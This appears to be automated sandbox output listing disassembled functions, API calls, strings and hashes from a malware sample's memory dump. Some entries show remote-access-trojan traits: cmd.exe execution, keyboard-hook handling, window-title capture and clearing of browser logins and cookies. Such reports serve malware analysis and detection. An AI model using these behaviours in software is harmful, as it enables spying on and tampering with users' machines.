Instruction Fuzzy Hash: FEF0C271440218FBCF009FA1EC45FEE373CEB00756F10856AF905A61A1EB359E04DA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040DEF4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DEFF
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DF3E

Part of subcall function 00435583: _Yarn.LIBCPMT ref: 004355A2
Part of subcall function 00435583: _Yarn.LIBCPMT ref: 004355C6

__CxxThrowException@8.LIBVCRUNTIME ref: 0040DF64

Strings

bad locale name, xrefs: 0040DF4E

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 200f2f18e168fc05f0ed7699c6408b8cd371a6a5460fb5ad8008edae59fbe345
Instruction ID: db90c3436e337910c3e98b764f87bb4696ab9b2babf94f2e459d4bdb298d91bb
Opcode Fuzzy Hash: 200f2f18e168fc05f0ed7699c6408b8cd371a6a5460fb5ad8008edae59fbe345
Instruction Fuzzy Hash: 29F044316046046AC734FB66DC53A9A73A49F14714F50897FB40A228D2EF7CAA1ECA99

Uniqueness

Uniqueness Score: -1.00%

Function 0041603C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041607E

Strings

cmd.exe, xrefs: 00416073
/C , xrefs: 0041605C
open, xrefs: 00416078

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: 610f9d4ab85ed9ed832b0f828398e7d329f4f9d56a6ab645d364716947e3a920
Instruction ID: bc4dd6aa4ab558d655425de935e10167e04fb3070ff3751930c06e50bc580138
Opcode Fuzzy Hash: 610f9d4ab85ed9ed832b0f828398e7d329f4f9d56a6ab645d364716947e3a920
Instruction Fuzzy Hash: 0FE0C0B0208305AAC605E775CC95CBF73ADAA94749B50483F7142A21E2EF7C9D49C659

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D006,004752D8,004752F0,?,pth_unenc), ref: 0040B809
UnhookWindowsHookEx.USER32(004750F0), ref: 0040B815
TerminateThread.KERNEL32(0040A267,00000000,?,pth_unenc), ref: 0040B823

Strings

pth_unenc, xrefs: 0040B7FA

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction ID: 7225ec322da407d72c5b2b1858536f2023f8fa499673018caf64050c5ea1622b
Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
Instruction Fuzzy Hash: 14E01272205356EFD7241FA09C88C267AEEDA5479A724087EF2C3526A1CA794C10CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
GetProcAddress.KERNEL32(00000000), ref: 0040141B

Strings

GetCursorInfo, xrefs: 0040140A
User32.dll, xrefs: 0040140F

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Uniqueness

Uniqueness Score: -1.00%

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

GetLastInputInfo, xrefs: 004014AF
User32.dll, xrefs: 004014B4

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Uniqueness

Uniqueness Score: -1.00%

Function 00CCAF1F Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00CCAFA6

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a6b94c66f384b87350474e45a72df701c63bd39e2c407c1191826adeddd11952
Instruction ID: 0bf8f05058927b39290233d270046819688167186ddedb903eaacdc1ff971e27
Opcode Fuzzy Hash: a6b94c66f384b87350474e45a72df701c63bd39e2c407c1191826adeddd11952
Instruction Fuzzy Hash: 94B144729006459FDB118FA8C892FBEBBF5EF45340F1841AEE861DB241D7359E02CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00449EC4 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00449F4F
__alldvrm.LIBCMT ref: 0044A150
__alldvrm.LIBCMT ref: 0044A172

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: fbb6a2cd6f9bf6d969b44a73e529f1d3b5c9d8165b987cb2c487aba83d58bdfa
Instruction ID: 1c99c1baa2c1a51b22a7fec4170ab91f976f64832bd9cd75480204965eff695a
Opcode Fuzzy Hash: fbb6a2cd6f9bf6d969b44a73e529f1d3b5c9d8165b987cb2c487aba83d58bdfa
Instruction Fuzzy Hash: 49A14532A442869FFB21CF18C8817ABBBA5EF15314F18416FE8859B382C23C8D55C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4010 Relevance: 6.3, APIs: 4, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3922dfdde3da41f612c260adee25e1231fae8644cd662a269f658c2521a05857
Instruction ID: 12dd57daedb0993c31d11761ead554a6d707fc71ddc44943b25e681bc7d43a46
Opcode Fuzzy Hash: 3922dfdde3da41f612c260adee25e1231fae8644cd662a269f658c2521a05857
Instruction Fuzzy Hash: 24717831E051845BDF24EF69EC8A7ED77A1EB46320F540299EC0087383EB759E8487D2

Uniqueness

Uniqueness Score: -1.00%

Function 00456B5A Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00456C89

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 33da098cc60deeed093464b680477ce6b92a1a60bdc287e57d9570303dc7c70e
Instruction ID: e3068bce613121f7da0e89462de2b1c1cd52f701d27a7b22a158919516451886
Opcode Fuzzy Hash: 33da098cc60deeed093464b680477ce6b92a1a60bdc287e57d9570303dc7c70e
Instruction Fuzzy Hash: 73416E31A001006BEB226F7A8C4576F36A4EF41336F56021FFC58D7293DA7D88454A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00CB4710 Relevance: 6.1, APIs: 4, Instructions: 146libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C), ref: 00CB4766
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CB47C5
GetProcAddress.KERNEL32(00000000), ref: 00CB47CC

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: b3cd067ea7a358939f7a5d29efe7032ea9a0089c2f2a117f1ecb39d6b9edf937
Instruction ID: 8d1c8caa6e2a4c8f70d8fc5c8f5417e784808d80fc66e42f43e1379c7acc72c9
Opcode Fuzzy Hash: b3cd067ea7a358939f7a5d29efe7032ea9a0089c2f2a117f1ecb39d6b9edf937
Instruction Fuzzy Hash: 01416831D142589BDB18AB68DC4ABDDBB75EF41314F404269EC00E72D2EB369A80C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 00442741 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: e5160d508a83ee6b7869f395aed11d8c970f4fa8f11d615d3853c79058a8dc25
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: F8411B71A00708BFE724AF79CD41B6ABBE8EB84714F50862FF501DB2C1D7B999418B94

Uniqueness

Uniqueness Score: -1.00%

Function 00CD292E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CD29FE
_free.LIBCMT ref: 00CD2A27
SetEndOfFile.KERNEL32(00000000,00CCE60E,00000000,00CC87EE,?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000), ref: 00CD2A59
GetLastError.KERNEL32(?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000,?,?,?,?,00000000), ref: 00CD2A75

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 9bf6ae2f23abfaaab2bbdb313ec24652a99e24453ef88d16f0af34fb7615d900
Instruction ID: 7867067bb0d2a13ad74349d17a490d27aad403386dc6117c46114e9cae82ce35
Opcode Fuzzy Hash: 9bf6ae2f23abfaaab2bbdb313ec24652a99e24453ef88d16f0af34fb7615d900
Instruction Fuzzy Hash: DB41F632900645ABDB21ABA9CC42F9E7775EF58370F240516F628E73A1EA31DD41B721

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF5A Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040BF6F
Sleep.KERNEL32(00001388), ref: 0040BFF7

Strings

Cleared browsers logins and cookies., xrefs: 0040C043
[Cleared browsers logins and cookies.], xrefs: 0040C032

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 669e323831cdddd66562449176982fab7b8ad7f083fc91f7ced72f2e2ccb54a5
Instruction ID: cc9ddbdf17d26b75090e7d6a2d5a8c34be93039c878197950bbada9121290459
Opcode Fuzzy Hash: 669e323831cdddd66562449176982fab7b8ad7f083fc91f7ced72f2e2ccb54a5
Instruction Fuzzy Hash: B431C4143483826ED6116B7558567AB7B828E53754F0844BFB8C46B3C3DA7E48488BEF

Uniqueness

Uniqueness Score: -1.00%

Function 00CCB8CD Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00CC4F1F: _free.LIBCMT ref: 00CC4F2D

Part of subcall function 00CCC8A4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00CD24A0,?,00000000,00000000), ref: 00CCC946

GetLastError.KERNEL32 ref: 00CCB935
__dosmaperr.LIBCMT ref: 00CCB93C
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00CCB97B
__dosmaperr.LIBCMT ref: 00CCB982

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 78ed4a0b0d8af5ff852bb99efb4dfc744e62e90c56144c188e5725423c0dc88e
Instruction ID: 37deb0d49f98746df2da3ad3a675ffd31fb363036b326d085692d6b80533dc44
Opcode Fuzzy Hash: 78ed4a0b0d8af5ff852bb99efb4dfc744e62e90c56144c188e5725423c0dc88e
Instruction Fuzzy Hash: 5D21B371A00615AF9B206FE6CC82F6BB7ACEF44364F14852CFA6D97191D734ED4097A0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCBF61 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4865f2e4a3e4d4d9e688a629bbe3fb5841a3993a720a0176f71a5259660055
Instruction ID: aee02ef49978014f96827d0d0bf376534454e40adbe585ea3c207807a657c3a7
Opcode Fuzzy Hash: 6e4865f2e4a3e4d4d9e688a629bbe3fb5841a3993a720a0176f71a5259660055
Instruction Fuzzy Hash: 39219D71604209EFDB20AFA1DC81F2B77ADEF443A8B10452CF92996291E731ED419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9242 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00CC4E9D,?,?,?,?,00CC596B,?), ref: 00CC9247
_free.LIBCMT ref: 00CC92A4
_free.LIBCMT ref: 00CC92DA
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,?,00CC4E9D,?,?,?,?,00CC596B,?), ref: 00CC92E5

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d44f88146c60e780c9769fd47ecb1146110c5416159941cc49c995e55ea3ec5b
Instruction ID: 4dc4d1f31a5ef86c69f504da09f09ae0e0bf13bf42f09289aba4e93cada2ac00
Opcode Fuzzy Hash: d44f88146c60e780c9769fd47ecb1146110c5416159941cc49c995e55ea3ec5b
Instruction Fuzzy Hash: A511C632205141BA9B107AB5DCCFF7F3159DBC2775B25022DF539971D2EE318D056210

Uniqueness

Uniqueness Score: -1.00%

Function 0040A477 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C49F: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C4AF
Part of subcall function 0041C49F: GetWindowTextLengthW.USER32(00000000), ref: 0041C4B8
Part of subcall function 0041C49F: GetWindowTextW.USER32 ref: 0041C4E2

Sleep.KERNEL32(000001F4), ref: 0040A4C1
Sleep.KERNEL32(00000064), ref: 0040A54B

Strings

[ , xrefs: 0040A4DD
], xrefs: 0040A4C9

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: e26e369cf829a5693ea69bcd5f2ff19f0489d143354a02a2f8d2dfb362c33519
Instruction ID: 673b891c05171ccbd57fb692160b55fa7372551b064b24c29e954696105cbb10
Opcode Fuzzy Hash: e26e369cf829a5693ea69bcd5f2ff19f0489d143354a02a2f8d2dfb362c33519
Instruction Fuzzy Hash: 68119D315043006BC614FB26DC179AFB7A8AF90318F40053FF656665E2FF79AA18869B

Uniqueness

Uniqueness Score: -1.00%

Function 00CC9399 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00CC5905,00CC8977,?,?,00CC7A83), ref: 00CC939E
_free.LIBCMT ref: 00CC93FB
_free.LIBCMT ref: 00CC9431
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,?,00CC5905,00CC8977,?,?,00CC7A83), ref: 00CC943C

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7e9a8043e783d25f64b019fb064729b9b22dbdf95fb958d635bc6038c2ac2da4
Instruction ID: 19b910c46aa5345445a8dd60fe0273e068394b7b32330024d0a1b7aacaed66e9
Opcode Fuzzy Hash: 7e9a8043e783d25f64b019fb064729b9b22dbdf95fb958d635bc6038c2ac2da4
Instruction Fuzzy Hash: D511E532605582AA96107A75ECCFF7F2559DBC1774B29022CF538971E1EF318D066220

Uniqueness

Uniqueness Score: -1.00%

Function 00443992 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 639b9409e2fb930854833158115cd827a0c242071936a85f60160cf34ce6723c
Instruction ID: 54c03e9ce3202a4369395dee973575ff668b27e25674208517661f9046cc78fb
Opcode Fuzzy Hash: 639b9409e2fb930854833158115cd827a0c242071936a85f60160cf34ce6723c
Instruction Fuzzy Hash: C901F2B22093067EFA202E792CC5F67271CCF41BBAB31032BF421612C1EAA8CD00416D

Uniqueness

Uniqueness Score: -1.00%

Function 00443A11 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4348ab701141db2ee471a76f6354be3bba6a68761b83c07e18708a65b4a21837
Instruction ID: ee859d392e96439f373780085e5d4acac94642adf9cf6752a144726972cbb9ce
Opcode Fuzzy Hash: 4348ab701141db2ee471a76f6354be3bba6a68761b83c07e18708a65b4a21837
Instruction Fuzzy Hash: 8901D1B26096167EBA205EB97CC5D27A24DDF41BBA331033BF821B12E1DB28CD014169

Uniqueness

Uniqueness Score: -1.00%

Function 00448426 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue), ref: 00448458
GetLastError.KERNEL32(?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004481A7), ref: 00448464
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004483CD,00000000,00000000,00000000,00000000,?,004486F9,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 00448472

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: 41fac99623056356db925a1322829ea0c7156d24612c337f6d29b46335df47c5
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: 1301FC32602327EBD7218B789C4495B7B58BF05B61B214639FD09D3241EF28DD01C6D8

Uniqueness

Uniqueness Score: -1.00%

Function 0041C3D3 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC
GetFileSize.KERNEL32(00000000,00000000), ref: 0041C400
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C425
CloseHandle.KERNEL32(00000000), ref: 0041C433

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 7d1abebc12fc94ec9a74679c21743bb31c0bab12d6289aad5436d2a906a43a00
Instruction ID: 9460c0e9f1be17d3a5c73fdfb64ffb2f3e7011bcb4b74989fe8713925d790063
Opcode Fuzzy Hash: 7d1abebc12fc94ec9a74679c21743bb31c0bab12d6289aad5436d2a906a43a00
Instruction Fuzzy Hash: 75F0F6B1245318BFE2101B25ECD8FBB365CEB867A9F00053EF801A22C1CA298C059176

Uniqueness

Uniqueness Score: -1.00%

Function 0041C12B Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C181
